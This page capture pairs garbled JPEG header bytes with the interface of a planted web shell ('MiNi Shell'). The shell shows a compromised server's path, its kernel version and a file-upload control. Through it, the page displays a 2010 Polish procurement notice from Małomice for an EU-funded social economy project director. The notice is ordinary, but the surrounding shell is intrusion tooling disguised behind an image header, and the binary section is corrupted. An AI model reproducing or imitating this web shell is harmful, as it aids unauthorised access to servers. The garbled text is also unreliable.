JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100420/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100420/112422-N-2010.html

<p class="kh_header"><b>Małomice: Świadczenie usług tutora sieci wsparcia Ekonomii Społecznej  - Dyrektora merytorycznego projektu: (Współpraca międzysektorowa na rzecz wspierania ekonomii społecznej w regionie lubuskim) w ramach Programu Operacyjnego Kapitał Ludzki</b><br>
<b>Numer ogłoszenia: 112422 - 2010; data zamieszczenia: 20.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Małomice , Plac Konstytucji 3 Maja 1, 67-320 Małomice, woj. lubuskie, tel. 068 3769027, faks 068 3769051 w. 12.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług tutora sieci wsparcia Ekonomii Społecznej  - Dyrektora merytorycznego projektu: (Współpraca międzysektorowa na rzecz wspierania ekonomii społecznej w regionie lubuskim) w ramach Programu Operacyjnego Kapitał Ludzki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usług tutora sieci wsparcia Ekonomii Społecznej - Dyrektora merytorycznego projektu (Współpraca międzysektorowa na rzecz wspierania ekonomii społecznej w regionie lubuskim), który realizowany jest przez Gminę Małomice w ramach Programu Operacyjnego Kapitał Ludzki Priorytet VII. Promocja integracji społecznej, Działanie 7.2. Przciwdziałanie wykluczeniu i wzmocnienie sektora ekonomii społecznej, Poddziałanie 7.2.2 Wsparcie ekonomii społecznej.
Projekt jest współfinansowany ze środków Europejskiego Funduszu Społecznego. Celem ogólnym Projektu jest -wsparcie sektora ekonomii społecznej w województwie lubuskim. Cele pośrednie projektu to poprawa dostępu do zatrudnienia osób zagrożonych wykluczeniem społecznym i rozwijanie sektora ekonomii społecznej. Długofalowym celem projektu będzie włączenie wypracowanych i opisanych modeli trenera zatrudnienia wspieranego, organizacji KES wraz ze szczegółowo opracowanymi narzędziami zatrudnienia socjalnego i wspieranego do głównego nurtu polityki społecznej w regionie lubuskim.
Projekt przewiduje następujące zadania merytoryczne : 
Zad. 2: określa promocję ekonomii  społecznej i zatrudnienia w sektorze ekonomii społecznej ; aktywna rekrutacja BO i informowanie o wsparciu działań projektu ze środków UE. 
Zad. 3 Rozwój partnerstwa na rzecz rozwoju ekonomii społecznej (Regionalne Centrum Wsparcia Ekonomii Społecznej w Gorzowie Wlkp.  - jako nowego podmiotu wspierającego osoby wykluczone w instytucjach ekonomii społecznej. 3.1 Rozwój partnerstwa na rzecz rozwoju ES poprzez zatrudnienie animatorów w podregionie gorzowskim i zielonogórskim: -  współpraca z j.s.t, lokalnymi organizacjami pozarządowymi w zakresie inicjowania działań na rzecz rozwoju ES, - wypracowanie lokalnego modelowego systemu wsparcia, gdzie RCWES  będzie pełnił rolę moderatora partnerstw lokalnych, - 
Budowanie przyjaznego środowiska np. poprzez budowanie lokalnych partnerstw publiczno - społeczno - prywatnych, - promocja dobrych praktyk w obszarze partnerstwa na rzecz ES, - Budowanie partnerstw projektowych oraz partnerstw lokalnych. Projekt przewiduje również doradztwo, określone w zad 3 pkt 
3.2 Wsparcie indywidualne na potrzeby jednej osoby z jednej instytucji lub grupy kilku osób z jednej instytucji - 6 h., Wsparcie w zakresie całej instytucji i jej długookresowych możliwości rozwoju - 10h obejmujące: - prawne ( w tym zamówienia publiczne) - 460h, - marketingu usług ekonomii społecznej - 300h, - BHP i SANEPID - 80h. 3.3 Coaching: Wielkość wsparcia na jedna instytucję: max 40 h; - Diagnozowanie aktualnej pozycji instytucji - 400h, - Konstruowanie strategii i długoterminowych planów działania - 220h, - Tworzenie biznesplanu - 220h, - Pomoc w zdiagnozowaniu możliwych źródeł finansowania działalności (projektów instytucji - 220h, - Pomoc w przygotowaniu wniosku aplikacyjnego do wybranego działania) poddziałania - 200h, - Budżetowanie projektów społecznych - 160h, - Procedury prawne w tworzeniu partnerstw - 160h, - w obszarze przekazywania zadań publicznych organizacjom pozarządowym - 240h, - Opracowanie dokumentacji zarządczej dla tworzonych jednostek ES - 200h, - Procedury związane z zakładaniem i przygotowaniem  do rejestracji spółdzielni socjalnej - 180h. 3.4 Usługi prawne, księgowe, marketingowe, doradztwo finansowe, dla istniejących i nowo tworzonych jednostek ES wg zdiagnozowanych potrzeb BO - 600h. Narzędzie wsparcia: - Przygotowanie grup inicjatywnych do założenia podmiotów z zakresu ES, - Pomoc lokalowa w postaci udostępnienia sprzętu biurowego, oraz zorganizowanie Podmiotu od strony formalno -  prawnej, - Wsparcie i rzecznictwo na rzecz Podmiotu w instytucjach zewnętrznych, - Pomoc w przygotowaniu biznesplanu, analizy ekonomicznej, studium wykonalności, - usługi w zakresie księgowości, - Identyfikacja ryzyk przed założeniem Podmiotu oraz w pierwszym okresie działalności, - Konsultacje i doradztwo, a w sytuacjach szczególnych pomoc w zarządzaniu Podmiotem z zakresu prawa, rachunkowości, marketingu, - Pomoc w rozwiązywaniu konfliktów, - pomoc w pozyskaniu środków na rozpoczęcie lub rozwój Podmiotów z zakresu ES - pomoc w przygotowaniu projektów do PO KL, - Pomoc w pozyskiwaniu zleceń. 3.5  Punkt informacyjny w Zielonej Górze - wsparcie animacją na rzecz ekonomii społecznej na obszarze podregionu zielonogórskiego. 3.6 Ewaluacja działań projektu - opracowanie dobrych praktyk obejmuje badanie zarządzanie projektem, promocje szkolenia oraz specjalistyczne doradztwo oraz działalność RCWES w Gorzowie, PI w Zielonej Górze, 12 KES.
Zad. 4 Utworzenie i przetestowanie w 12 środowiskach lokalnych Klubów Ekonomii Społecznej (KES) (wieś, gmina miejsko - wiejska, małe miasto, duże miasto).
Zad. 5:  przewiduje szkolenia umożliwiające uzyskanie wiedzy i umiejętności potrzebnych do założenia i prowadzenia działalności w sektorze ekonomii społecznej: 1) (Metodologia tworzenia partnerskich i sieciowych projektów w realizacji celów statutowych na rzecz ekonomii społecznej)- 2 edycje x12 BO x 24h, 2) (Liderów(animatorów dla tworzenia sieci współpracy) - 1 edycja x12 BO x48h, 3) (Z zakresu zlecania zdań publicznych na rzecz III sektora) - 2 ed. X 12 BO x 24h, 4) Regionalnych trenerów wsparcia psychologicznego dla osób z grup wykluczenia społecznego - 2 ed. 12 BO x 192h, 5) Finanse i zasady finansowania przedsiębiorstw ES - 3 ed. x 12 BO x 24h, 6) Marketing przedsiębiorstw ES - 3 ed. x 12 BO x 24h, 7) Asesorów oceniających gminne, powiatowe i regionalne wnioski o dotację na rzecz ES - 3 ed. x 12 BO x 24h, 8) trenerów zatrudnienia wspieranego z elementami job coachingu - 1 ed. x 12 BO x 120h, 9) menedżerów społecznych z elementami coaching - 1 ed. x 16 BO x 168h, 10) kwalifikacyjny kurs pedagogiczny z elementami andragogiki dla instruktorów prac społecznie użytecznych i instruktorów zawodu - 2 ed. x 16 BO x 120h, 11)  Grup inicjatywnych do założenia Podmiotów z zakresu ES - warsztaty w powiatach - 12 ed. x 24h x 12 os, 12) Warsztaty psychospołeczne dla uczestników wszystkich szkoleń - 32 ed. x 12 BO x 24h..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 79.42.10.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.02.2012.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>1. O udzielenie zamówienia mogą ubiegać się wykonawcy, którzy spełniają warunki, dotyczące: 
a) posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania; 
b) posiadania wiedzy i doświadczenia;
c) dysponowania odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia; 
d) sytuacji ekonomicznej i finansowej,
e) nie podlegają wykluczeniu z postępowania o udzielenia zamówienia i potwierdzą swoją sytuację stosownym oświadczeniem.
2. Warunkiem szczególnym z zakresie posiadania niezbędnej wiedzy i doświadczenia, jest wykazanie, że Wykonawca dysponuje min. jedna osobą (lub przedstawi pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji osoby), która spełnia łącznie następujące warunki:
1.Ukończenie studiów wyższych, kierunek: Prawo, Politologia, Socjologia, Zarządzanie
2.Ukończenie szkoleń z zakresu zagadnień Europejskiego Funduszu Społecznego w  obszarze animacji działań lokalnych na rzecz rozwoju zasobów ludzkich,
3.Uprawnienia trenerskie,
4.Doświadczenie w obszarze: 
a) Zarządzanie projektami z Europejskiego Funduszu Społecznego, w tym uczestnictwo w zarządzaniu projektem o wartości powyżej 3 000 000 zł.
b) Minimum 3 letnie doświadczenie na stanowisku kierowniczym,
c) Zrealizowanych  minimum 400 godzin usług doradczych i szkoleniowych, 
d) Minimum roczne wykonywanie pracy w charakterze animatora działań lokalnych na rzecz rozwoju zasobów ludzkich, 
e) Realizacji minimum trzech projektów partnerskich z udziałem jednostek samorządu terytorialnego i organizacji pozarządowych, 
f) posiada znajomość zasad i procedur realizacji projektów finansowanych ze środków UE, przede wszystkim EFS, 
g) znajomość obsługi pakietu MS Office oraz Internetu, 
h) umiejętność planowania i organizacji pracy własnej i zespołu.
3. Zamawiający dokona oceny spełnienia powyższych warunków na podstawie złożonych (przez Wykonawcę, podmioty występujące wspólnie) dokumentów wymienionych w punkcie VI Specyfikacji Istotnych Warunków Zamówienia metodą warunku granicznego - spełnia / nie spełnia</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia warunków udziału w postępowaniu Wykonawca w ramach złożonej oferty składa Zamawiającemu następujące dokumenty i oświadczenia potwierdzające spełnianie tych warunków: 

1)uzupełniony załącznik Nr 1 do SIWZ - oferta na świadczenie usług.
2)uzupełniony załącznik Nr 2 do SIWZ - formularz cenowy.
3)oświadczenie o spełnieniu warunków udziału w postępowaniu oraz niepodleganiu wykluczeniu z postępowania sporządzone zgodnie ze wzorem określonym w Załączniku Nr 3 SIWZ, 
4)parafowana każda strona wzoru umowy - Załącznik Nr 4 do SIWZ.
5)wykaz osób / pracowników z pomocą których Wykonawca wykonywać będzie zamówienie wraz 	z dokumentami potwierdzającymi kwalifikacje (załącznik Nr 5 do SIWZ), wraz z dokumentami 	potwierdzającymi kwalifikacje, (dotyczy Wykonawcy prowadzącego działalność gospodarczą), - 	poniższe dokumenty do spełnienia tego warunku: 
a) dyplom ukończenia studiów wyższych, 
b) oświadczenie o znajomości ustawy Prawo Zamówień Publicznych oraz ustawy o finansach publicznych, 
c) oświadczenie o znajomości zasad i procedur realizacji projektów finansowanych ze środków UE, przede wszystkim EFS, 
d) dokument potwierdzający minimum 3 letnie doświadczenie zawodowe w pełnieniu funkcji kierowniczej ( należy dołączyć np. świadectwa pracy, zaświadczenia o zatrudnieniu) 
e) oświadczenie o znajomości obsługi pakietu MS Office oraz Internetu, 
f) oświadczenie o wyrażeniu zgody na przetwarzanie danych osobowych w związku z wykonywanym zamówieniem, 
g) oświadczenie o niekaralności, 
h) aktualne CV, 
i) kserokopię dowodu osobistego, dotyczy Wykonawcy, który nie prowadzi działalności gospodarczej.
6)Wykaz wykonanych usług odpowiadających swoim rodzajem usługom stanowiącym przedmiot 	zamówienia, z podaniem daty i miejsca wykonania oraz załączeniem dokumentów 	potwierdzających, że usługi te zostały wykonane - spełnieniem warunku będzie udokumentowanie 	przez Wykonawcę (osobę wskazaną do realizacji zamówienia) pełnienia usług kierowania lub 	koordynowania projektami współfinansowanymi ze środków Unii Europejskiej lub ze środków 	krajowych o wartości brutto projektu minimum 3.000.000,00 zł (które wynikały z pełnionej 	funkcji kierowniczej lub z umowy cywilnoprawnej) - do każdego z wymienionych zadań należy 	dołączyć dokumenty np. kopie umów, referencje, z których będzie wynikało minimum, kto 	wykonał wskazane usługi, podstawę wykonywania usług, jakiego programu dotyczyły, wartość 	przedmiotowego projektu - Załącznik Nr 6 do SIWZ, 
7)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji	działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do 	ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem 	terminu składania ofert (nie dotyczy Wykonawcy - osoby fizycznej nie prowadzącej działalności 	gospodarczej),</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunkiem szczególnym z zakresie posiadania niezbędnej wiedzy i doświadczenia, jest wykazanie, że Wykonawca dysponuje min. jedna osobą (lub przedstawi pisemne zobowiązanie innych podmiotów do oddania mu do dyspozycji osoby), która spełnia łącznie następujące warunki:
1.Ukończenie studiów wyższych, kierunek: Prawo, Politologia, Socjologia, Zarządzanie
2.Ukończenie szkoleń z zakresu zagadnień Europejskiego Funduszu Społecznego w  obszarze animacji działań lokalnych na rzecz rozwoju zasobów ludzkich,
3.Uprawnienia trenerskie,
4.Doświadczenie w obszarze: 
a) Zarządzanie projektami z Europejskiego Funduszu Społecznego, w tym uczestnictwo w zarządzaniu projektem o wartości powyżej 3 000 000 zł.
b) Minimum 3 letnie doświadczenie na stanowisku kierowniczym,
c) Zrealizowanych  minimum 400 godzin usług doradczych i szkoleniowych, 
d) Minimum roczne wykonywanie pracy w charakterze animatora działań lokalnych na rzecz rozwoju zasobów ludzkich, 
e) Realizacji minimum trzech projektów partnerskich z udziałem jednostek samorządu terytorialnego i organizacji pozarządowych, 
f) posiada znajomość zasad i procedur realizacji projektów finansowanych ze środków UE, przede wszystkim EFS, 
g) znajomość obsługi pakietu MS Office oraz Internetu, 
h) umiejętność planowania i organizacji pracy własnej i zespołu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://malomice.bip.pbox.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski w Małomicach, w sekretariacie na I piętrze, pok. nr 10.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.04.2010 godzina 11:00, miejsce: Urząd Miejski w Małomicach, w sekretariacie na I piętrze, pok. nr 10.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Programu Operacyjnego Kapitał Ludzki, Priorytet VII.  Promocja integracji społecznej.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com